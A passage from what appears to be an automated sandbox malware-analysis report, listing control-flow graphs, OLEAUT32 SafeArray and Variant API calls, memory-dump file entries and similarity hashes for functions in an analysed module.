                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Bound$Destroy$Element
                                            • String ID: A
                                            • API String ID: 959723449-3554254475
                                            • Opcode ID: 11359bf9e9031a5625f43d09b2d17d60f34c965b6140bc3c1cf58914f897aa2c
                                            • Instruction ID: 3edd601f8c596ef1ea3d6d4a7c6a2fae04066536b956a9c7c63050b7df1cc84d
                                            • Opcode Fuzzy Hash: 11359bf9e9031a5625f43d09b2d17d60f34c965b6140bc3c1cf58914f897aa2c
                                            • Instruction Fuzzy Hash: 26239374A00205DFEB00DFA4CC84F9DB7F9AF49318F948094EA19AF296DB71E985CB51

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1022 68962970-689629c1 1023 689629c3-689629c8 call 689bc1e0 1022->1023 1024 689629cd-689629d7 1022->1024 1023->1024 1088 689629d8 call f9d149 1024->1088 1089 689629d8 call f9d148 1024->1089 1026 689629da-689629dc 1027 68962d12-68962d18 1026->1027 1028 689629e2-689629e8 1026->1028 1029 68962d21-68962d37 1027->1029 1031 68962d1a-68962d1b SafeArrayDestroy 1027->1031 1028->1029 1030 689629ee-68962a1a SafeArrayGetLBound SafeArrayGetUBound 1028->1030 1030->1027 1032 68962a20-68962a37 SafeArrayGetElement 1030->1032 1031->1029 1032->1027 1033 68962a3d-68962a4d 1032->1033 1033->1023 1034 68962a53-68962a6f 1033->1034 1036 68962a75-68962a77 1034->1036 1037 68962d5a-68962d5f 1034->1037 1036->1037 1038 68962a7d-68962a92 call 689638e0 1036->1038 1039 68962c76-68962c78 1037->1039 1044 68962c58-68962c63 1038->1044 1045 68962a98-68962aac 1038->1045 1039->1027 1040 68962c7e-68962c86 1039->1040 1040->1027 1046 68962c65-68962c6a 1044->1046 1047 68962c6d-68962c72 1044->1047 1048 68962ab6-68962acc VariantInit 1045->1048 1049 68962aae-68962ab3 1045->1049 1046->1047 1047->1039 1048->1023 1050 68962ad2-68962ae3 1048->1050 1049->1048 1051 68962ae5-68962ae7 1050->1051 1052 68962ae9-68962aeb 1050->1052 1053 68962aee-68962af2 1051->1053 1052->1053 1054 68962af4-68962af6 1053->1054 1055 68962af8 1053->1055 1056 68962afa-68962b34 1054->1056 1055->1056 1058 68962b3a-68962b50 VariantInit 1056->1058 1059 68962c8b-68962caa VariantClear * 2 1056->1059 1058->1023 1060 68962b56-68962b67 1058->1060 1059->1047 1061 68962cac-68962cb4 1059->1061 1062 68962b6d-68962b6f 1060->1062 1063 68962b69-68962b6b 1060->1063 1061->1047 1064 68962b72-68962b76 1062->1064 1063->1064 1066 68962b7c 1064->1066 1067 68962b78-68962b7a 1064->1067 1068 68962b7e-68962bb8 1066->1068 1067->1068 1070 68962bbe-68962bcb 1068->1070 1071 68962d3a-68962d55 VariantClear * 3 1068->1071 1070->1071 1072 68962bd1-68962bf3 call 68973160 1070->1072 1071->1044 1076 68962cb6-68962cf1 VariantClear * 3 1072->1076 1077 68962bf9-68962c1f VariantClear * 3 1072->1077 1083 68962cf3-68962cf6 1076->1083 1084 68962cfb-68962d06 1076->1084 1078 68962c21-68962c26 1077->1078 1079 68962c29-68962c34 1077->1079 1078->1079 1081 68962c36-68962c3b 1079->1081 1082 68962c3e-68962c4d 1079->1082 1081->1082 1082->1032 1085 68962c53 1082->1085 1083->1084 1086 68962d10 1084->1086 1087 68962d08-68962d0d 1084->1087 1085->1027 1086->1027 1087->1086 1088->1026 1089->1026
                                            APIs
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 689629F6
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 68962A08
                                            • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 68962A2F
                                            • VariantInit.OLEAUT32(?), ref: 68962ABB
                                            • VariantInit.OLEAUT32(?), ref: 68962B3F
                                            • VariantClear.OLEAUT32(?), ref: 68962C04
                                            • VariantClear.OLEAUT32(?), ref: 68962C0B
                                            • VariantClear.OLEAUT32(?), ref: 68962C12
                                            • VariantClear.OLEAUT32(?), ref: 68962C96
                                            • VariantClear.OLEAUT32(?), ref: 68962C9D
                                            • VariantClear.OLEAUT32(?), ref: 68962CD6
                                            • VariantClear.OLEAUT32(?), ref: 68962CDD
                                            • VariantClear.OLEAUT32(?), ref: 68962CE4
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 68962D1B
                                            • VariantClear.OLEAUT32(?), ref: 68962D45
                                            • VariantClear.OLEAUT32(?), ref: 68962D4C
                                            • VariantClear.OLEAUT32(?), ref: 68962D53
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
                                            • String ID:
                                            • API String ID: 214056513-0
                                            • Opcode ID: 166da155e4d5c3fdc0d2492789b99918de59e5a86390737fb995a2ba70e3a907
                                            • Instruction ID: 30fb3a6141bac6e7ea2a86c91f740115ce87e81e8c3c922760b44b84a863e85f
                                            • Opcode Fuzzy Hash: 166da155e4d5c3fdc0d2492789b99918de59e5a86390737fb995a2ba70e3a907
                                            • Instruction Fuzzy Hash: D6C159716083419FE700CFA8C884A5BBBE9FF99314F60895DF6A5CB260C775E885CB52

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1090 6895af30-6895af95 VariantInit * 3 1091 6895af97-6895af9c call 689bc1e0 1090->1091 1092 6895afa1-6895afa7 1090->1092 1091->1092 1094 6895afb1-6895afbf 1092->1094 1095 6895afa9-6895afae 1092->1095 1171 6895afc0 call f9d149 1094->1171 1172 6895afc0 call f9d148 1094->1172 1095->1094 1096 6895afc2-6895afc4 1097 6895b22c-6895b252 VariantClear * 3 1096->1097 1098 6895afca-6895afda call 689638e0 1096->1098 1099 6895b254-6895b257 1097->1099 1100 6895b25c-6895b26a 1097->1100 1098->1097 1105 6895afe0-6895aff4 1098->1105 1099->1100 1103 6895b274-6895b288 1100->1103 1104 6895b26c-6895b271 1100->1104 1104->1103 1106 6895aff6-6895aff9 1105->1106 1107 6895affe-6895b015 VariantCopy 1105->1107 1106->1107 1108 6895b017-6895b018 call 689bc1e0 1107->1108 1109 6895b01d-6895b033 VariantClear 1107->1109 1108->1109 1110 6895b035-6895b03a call 689bc1e0 1109->1110 1111 6895b03f-6895b050 1109->1111 1110->1111 1114 6895b056-6895b058 1111->1114 1115 6895b052-6895b054 1111->1115 1116 6895b05b-6895b05f 1114->1116 1115->1116 1117 6895b065 1116->1117 1118 6895b061-6895b063 1116->1118 1119 6895b067-6895b09a 1117->1119 1118->1119 1169 6895b09d call f9d149 1119->1169 1170 6895b09d call f9d148 1119->1170 1120 6895b09f-6895b0a1 1120->1097 1121 6895b0a7-6895b0b3 call 689a9bb5 1120->1121 1124 6895b0b5-6895b0bf 1121->1124 1125 6895b0c1 1121->1125 1126 6895b0c3-6895b0ca 1124->1126 1125->1126 1127 6895b0d0-6895b0d9 1126->1127 1127->1127 1128 6895b0db-6895b111 call 689a91e1 call 689aa136 1127->1128 1133 6895b113-6895b118 call 689bc1e0 1128->1133 1134 6895b11d-6895b12b 1128->1134 1133->1134 1136 6895b131-6895b133 1134->1136 1137 6895b12d-6895b12f 1134->1137 1138 6895b136-6895b13a 1136->1138 1137->1138 1139 6895b140 1138->1139 1140 6895b13c-6895b13e 1138->1140 1141 6895b142-6895b17e 1139->1141 1140->1141 1143 6895b180-6895b18a 1141->1143 1144 6895b1ff-6895b203 1141->1144 1145 6895b190-6895b1b9 SafeArrayGetLBound SafeArrayGetUBound 1143->1145 1146 6895b28d-6895b2b8 VariantClear * 3 1143->1146 1147 6895b205-6895b20e call 689a9c35 1144->1147 1148 6895b210-6895b215 1144->1148 1153 6895b1bf-6895b1cd SafeArrayAccessData 1145->1153 1154 6895b28b 1145->1154 1149 6895b2c2-6895b2d0 1146->1149 1150 6895b2ba-6895b2bf 1146->1150 1147->1148 1151 6895b217-6895b220 call 689a9c35 1148->1151 1152 6895b223-6895b229 call 689a9b35 1148->1152 1157 6895b2d2-6895b2d7 1149->1157 1158 6895b2da-6895b2ee 1149->1158 1150->1149 1151->1152 1152->1097 1153->1154 1160 6895b1d3-6895b1f7 call 689a91e1 call 689aa530 SafeArrayUnaccessData 1153->1160 1154->1146 1157->1158 1160->1154 1168 6895b1fd 1160->1168 1168->1144 1169->1120 1170->1120 1171->1096 1172->1096
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 6895AF75
                                            • VariantInit.OLEAUT32(?), ref: 6895AF7C
                                            • VariantInit.OLEAUT32(?), ref: 6895AF83
                                            • VariantCopy.OLEAUT32(?,?), ref: 6895B00D
                                            • VariantClear.OLEAUT32(?), ref: 6895B027
                                            • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6895B19C
                                            • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6895B1AA
                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 6895B1C5
                                            • _memmove.LIBCMT ref: 6895B1E6
                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 6895B1EF
                                            • VariantClear.OLEAUT32(?), ref: 6895B237
                                            • VariantClear.OLEAUT32(?), ref: 6895B23E
                                            • VariantClear.OLEAUT32(?), ref: 6895B245
                                            • VariantClear.OLEAUT32(?), ref: 6895B29D
                                            • VariantClear.OLEAUT32(?), ref: 6895B2A4
                                            • VariantClear.OLEAUT32(?), ref: 6895B2AB
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
                                            • String ID:
                                            • API String ID: 3403836469-0
                                            • Opcode ID: 55c523c039bdefd90bb63d902d8ecb8f4414fae8b1acd97e3e38b6691bb2f4c2
                                            • Instruction ID: 8ed006b750185df1044d33b5bf0aa16a423567e1e5d66d8c2ab40c43b59592a7
                                            • Opcode Fuzzy Hash: 55c523c039bdefd90bb63d902d8ecb8f4414fae8b1acd97e3e38b6691bb2f4c2
                                            • Instruction Fuzzy Hash: 1BC148B26083419FD700DF68C88496BB7F9FB99304F90496DF669DB250D731E905CBA2

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1173 6896d410-6896d44c 1174 6896d472-6896d4e0 VariantInit * 3 1173->1174 1175 6896d44e-6896d465 1173->1175 1176 6896d4e2-6896d4ea 1174->1176 1177 6896d4ec-6896d4f2 1174->1177 1178 6896d4f6-6896d504 1176->1178 1177->1178 1179 6896d506-6896d50d 1178->1179 1180 6896d51e-6896d527 1178->1180 1181 6896d514-6896d516 1179->1181 1182 6896d50f-6896d512 1179->1182 1183 6896d538-6896d53c 1180->1183 1184 6896d529-6896d530 1180->1184 1185 6896d518-6896d51c 1181->1185 1182->1185 1187 6896d540-6896d544 1183->1187 1184->1183 1186 6896d532-6896d536 1184->1186 1185->1179 1185->1180 1186->1187 1188 6896d704-6896d72f VariantClear * 3 1187->1188 1189 6896d54a-6896d5c0 call 689a9d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1187->1189 1191 6896d731-6896d757 1188->1191 1192 6896d76c-6896d783 1188->1192 1197 6896d5c6-6896d5ea call 689aa530 SafeArrayUnaccessData 1189->1197 1198 6896d5c2-6896d5c4 1189->1198 1194 6896d470 1191->1194 1195 6896d75d 1191->1195 1194->1174 1199 6896d5ec-6896d605 SafeArrayPutElement 1197->1199 1198->1199 1202 6896d6e5-6896d6eb 1199->1202 1203 6896d60b-6896d629 1199->1203 1206 6896d6f6-6896d6f8 1202->1206 1207 6896d6ed-6896d6f3 call 689a9d2c 1202->1207 1204 6896d633-6896d64f SafeArrayPutElement VariantClear 1203->1204 1205 6896d62b-6896d630 1203->1205 1204->1202 1209 6896d655-6896d664 1204->1209 1205->1204 1210 6896d701 1206->1210 1211 6896d6fa-6896d6fb SafeArrayDestroy 1206->1211 1207->1206 1213 6896d762-6896d767 call 689bc1e0 1209->1213 1214 6896d66a-6896d694 1209->1214 1210->1188 1211->1210 1213->1192 1226 6896d697 call f9d149 1214->1226 1227 6896d697 call f9d148 1214->1227 1216 6896d699-6896d69b 1216->1202 1217 6896d69d-6896d6a9 1216->1217 1217->1202 1218 6896d6ab-6896d6c1 call 6895db30 1217->1218 1218->1202 1221 6896d6c3-6896d6e0 call 689656b0 call 68966880 1218->1221 1221->1202 1226->1216 1227->1216
                                            APIs
                                            • VariantInit.OLEAUT32 ref: 6896D4B3
                                            • VariantInit.OLEAUT32 ref: 6896D4C5
                                            • VariantInit.OLEAUT32(?), ref: 6896D4CC
                                            • _malloc.LIBCMT ref: 6896D551
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6896D58B
                                            • SafeArrayCreateVector.OLEAUT32 ref: 6896D5A6
                                            • SafeArrayAccessData.OLEAUT32 ref: 6896D5B8
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
                                            • String ID:
                                            • API String ID: 1552365394-0
                                            • Opcode ID: 4f0d50f77f02e2f07aee1c7093134e889f2a229b33119ef1b4b981f2c22c2262
                                            • Instruction ID: 04a1389187644ad6d9413b5b2632cb2972b4012f673727294723a1005a54f210
                                            • Opcode Fuzzy Hash: 4f0d50f77f02e2f07aee1c7093134e889f2a229b33119ef1b4b981f2c22c2262
                                            • Instruction Fuzzy Hash: 9FB159B56083009FD314CF28C880A5BB7E9FF99324F54895DF8A597351E732E945CB92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1228 6896d468 1229 6896d470-6896d4e0 VariantInit * 3 1228->1229 1231 6896d4e2-6896d4ea 1229->1231 1232 6896d4ec-6896d4f2 1229->1232 1233 6896d4f6-6896d504 1231->1233 1232->1233 1234 6896d506-6896d50d 1233->1234 1235 6896d51e-6896d527 1233->1235 1236 6896d514-6896d516 1234->1236 1237 6896d50f-6896d512 1234->1237 1238 6896d538-6896d53c 1235->1238 1239 6896d529-6896d530 1235->1239 1240 6896d518-6896d51c 1236->1240 1237->1240 1242 6896d540-6896d544 1238->1242 1239->1238 1241 6896d532-6896d536 1239->1241 1240->1234 1240->1235 1241->1242 1243 6896d704-6896d72f VariantClear * 3 1242->1243 1244 6896d54a-6896d5c0 call 689a9d66 SafeArrayCreateVector * 2 SafeArrayAccessData 1242->1244 1246 6896d731-6896d757 1243->1246 1247 6896d76c-6896d783 1243->1247 1251 6896d5c6-6896d5ea call 689aa530 SafeArrayUnaccessData 1244->1251 1252 6896d5c2-6896d5c4 1244->1252 1246->1229 1249 6896d75d 1246->1249 1253 6896d5ec-6896d605 SafeArrayPutElement 1251->1253 1252->1253 1256 6896d6e5-6896d6eb 1253->1256 1257 6896d60b-6896d629 1253->1257 1260 6896d6f6-6896d6f8 1256->1260 1261 6896d6ed-6896d6f3 call 689a9d2c 1256->1261 1258 6896d633-6896d64f SafeArrayPutElement VariantClear 1257->1258 1259 6896d62b-6896d630 1257->1259 1258->1256 1263 6896d655-6896d664 1258->1263 1259->1258 1264 6896d701 1260->1264 1265 6896d6fa-6896d6fb SafeArrayDestroy 1260->1265 1261->1260 1267 6896d762-6896d767 call 689bc1e0 1263->1267 1268 6896d66a-6896d694 1263->1268 1264->1243 1265->1264 1267->1247 1280 6896d697 call f9d149 1268->1280 1281 6896d697 call f9d148 1268->1281 1270 6896d699-6896d69b 1270->1256 1271 6896d69d-6896d6a9 1270->1271 1271->1256 1272 6896d6ab-6896d6c1 call 6895db30 1271->1272 1272->1256 1275 6896d6c3-6896d6e0 call 689656b0 call 68966880 1272->1275 1275->1256 1280->1270 1281->1270
                                            APIs
                                            • VariantInit.OLEAUT32 ref: 6896D4B3
                                            • VariantInit.OLEAUT32 ref: 6896D4C5
                                            • VariantInit.OLEAUT32(?), ref: 6896D4CC
                                            • _malloc.LIBCMT ref: 6896D551
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6896D58B
                                            • SafeArrayCreateVector.OLEAUT32 ref: 6896D5A6
                                            • SafeArrayAccessData.OLEAUT32 ref: 6896D5B8
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6896D601
                                            • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6896D63E
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
                                            • String ID:
                                            • API String ID: 2723946344-0
                                            • Opcode ID: e4323662194c405bff77cfb83d078ce8847fb685f670afdf8e78a77356e69383
                                            • Instruction ID: e6fa334adc1bf80fc0aec292b5d6976e7fed032c29042ef852918b8b22d1c0bc
                                            • Opcode Fuzzy Hash: e4323662194c405bff77cfb83d078ce8847fb685f670afdf8e78a77356e69383
                                            • Instruction Fuzzy Hash: 229149B56083019FE314CF28C880A5BB7F9BF89318F64895DF9A58B351D732E945CB92

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1282 689644c0-68964538 VariantInit * 2 SafeArrayCreateVector 1283 68964542-68964564 SafeArrayPutElement VariantClear 1282->1283 1284 6896453a-6896453d 1282->1284 1285 6896476f-68964774 1283->1285 1286 6896456a-68964598 SafeArrayCreateVector SafeArrayPutElement 1283->1286 1284->1283 1287 68964776-68964777 SafeArrayDestroy 1285->1287 1288 6896477d-6896479b VariantClear * 2 1285->1288 1286->1285 1289 6896459e-689645b9 SafeArrayPutElement 1286->1289 1287->1288 1290 689647b0-689647c4 1288->1290 1291 6896479d-689647ad 1288->1291 1289->1285 1292 689645bf-689645d2 SafeArrayPutElement 1289->1292 1291->1290 1292->1285 1293 689645d8-689645e3 1292->1293 1294 689645e5-689645ea call 689bc1e0 1293->1294 1295 689645ef-68964604 1293->1295 1294->1295 1295->1285 1298 6896460a-68964615 1295->1298 1298->1285 1299 6896461b-6896469f 1298->1299 1306 689646a1-6896471f 1299->1306 1312 68964721-68964758 1306->1312 1315 6896475f-6896476a call 6896de60 1312->1315 1316 6896475a call 689a919e 1312->1316 1318 6896476c 1315->1318 1316->1315 1318->1285
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 689644FF
                                            • VariantInit.OLEAUT32(?), ref: 68964505
                                            • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 68964516
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 68964551
                                            • VariantClear.OLEAUT32(?), ref: 6896455A
                                            • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 68964579
                                            • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 68964594
                                            • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 689645B5
                                            • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 689645CE
                                            • std::tr1::_Xweak.LIBCPMT ref: 6896475A
                                            • SafeArrayDestroy.OLEAUT32(?), ref: 68964777
                                            • VariantClear.OLEAUT32(?), ref: 68964787
                                            • VariantClear.OLEAUT32(?), ref: 6896478D
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
                                            • String ID:
                                            • API String ID: 1304965753-0
                                            • Opcode ID: bae624b669ca20d441a9bf4b232b56d29fdb5efbfe3dfb001a01a3520a1696a4
                                            • Instruction ID: 67e1e4893564571499062dbdbae393b6e4d266264cf0ecceda2635520555bd93
                                            • Opcode Fuzzy Hash: bae624b669ca20d441a9bf4b232b56d29fdb5efbfe3dfb001a01a3520a1696a4
                                            • Instruction Fuzzy Hash: B7A12B75A0020A9FDB14DBE4C984EAFB7B9FF89710F544629E506EB780C631E941CF60

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1320 6896bf00-6896bf6a VariantInit * 4 1321 6896bf74-6896bf86 1320->1321 1322 6896bf6c-6896bf71 1320->1322 1323 6896bf90-6896bfbb call 6896c150 1321->1323 1324 6896bf88-6896bf8d 1321->1324 1322->1321 1327 6896c0c4-6896c0cd 1323->1327 1328 6896bfc1-6896bfdf call 6896c150 1323->1328 1324->1323 1329 6896c0e2-6896c149 call 689aa1f7 * 2 VariantClear * 4 call 689a948b 1327->1329 1330 6896c0cf-6896c0df 1327->1330 1328->1327 1335 6896bfe5-6896c019 call 6896dc40 1328->1335 1330->1329 1341 6896c020-6896c029 1335->1341 1342 6896c01b-6896c01e 1335->1342 1345 6896c02e 1341->1345 1346 6896c02b-6896c02c 1341->1346 1344 6896c035-6896c037 call 689644c0 1342->1344 1349 6896c03c-6896c03e 1344->1349 1347 6896c030-6896c032 1345->1347 1346->1347 1347->1344 1349->1327 1351 6896c044-6896c05c VariantInit VariantCopy 1349->1351 1352 6896c064-6896c07a 1351->1352 1353 6896c05e-6896c05f call 689bc1e0 1351->1353 1352->1327 1356 6896c07c-6896c094 VariantInit VariantCopy 1352->1356 1353->1352 1357 6896c096-6896c097 call 689bc1e0 1356->1357 1358 6896c09c-6896c0af 1356->1358 1357->1358 1358->1327 1361 6896c0b1-6896c0c0 1358->1361 1361->1327
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000E.00000002.2681350500.0000000068941000.00000020.00000001.01000000.00000027.sdmp, Offset: 68940000, based on PE: true
                                            • Associated: 0000000E.00000002.2680641954.0000000068940000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2687798649.00000000689C4000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688501762.00000000689DE000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688558472.00000000689E0000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2688623479.00000000689E1000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2692841937.00000000689E3000.00000008.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EA000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2694619679.00000000689EC000.00000004.00000001.01000000.00000027.sdmpDownload File
                                            • Associated: 0000000E.00000002.2698075637.00000000689EE000.00000002.00000001.01000000.00000027.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_14_2_68940000_A_22rjVO67ooiUk2ueyL6tMl.jbxd
                                            Similarity
                                            • API ID: Variant$Init$Clear$Copy
                                            • String ID:
                                            • API String ID: 3833040332-0
                                            • Opcode ID: 4a4ef4b4333fac1039a7d6ab00404df7ce06c4c11b0bdab7a349ef0f98611f53
